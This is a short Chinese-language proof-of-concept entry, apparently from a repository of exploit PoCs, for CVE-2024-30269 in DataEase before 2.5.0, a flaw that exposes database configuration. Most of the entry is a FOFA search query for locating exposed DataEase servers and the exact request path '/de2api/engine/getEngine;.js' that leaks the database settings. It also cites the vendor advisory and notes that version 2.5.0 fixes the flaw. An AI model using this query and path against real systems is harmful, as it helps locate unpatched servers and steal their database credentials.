POC/wpoc/DataEase/DataEase存在数据库配置信息暴露漏洞(CVE-2024-30269).md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

21 lines
653 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# DataEase存在数据库配置信息暴露漏洞(CVE-2024-30269)
DataEase是一个开源数据可视化和分析工具在版本2.5.0之前存在数据库配置信息暴露漏洞。通过浏览器访问`/de2api/engine/getEngine;.js`路径可以获取平台的数据库配置。该漏洞已在v2.5.0中修复,除了升级之外,没有已知的解决方法。
## fofa
```javascript
body="Dataease"
```
## poc
```javascript
/de2api/engine/getEngine;.js
```
![image](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409251726851.png)
## 漏洞来源
- https://github.com/dataease/dataease/security/advisories/GHSA-8gvx-4qvj-6vv5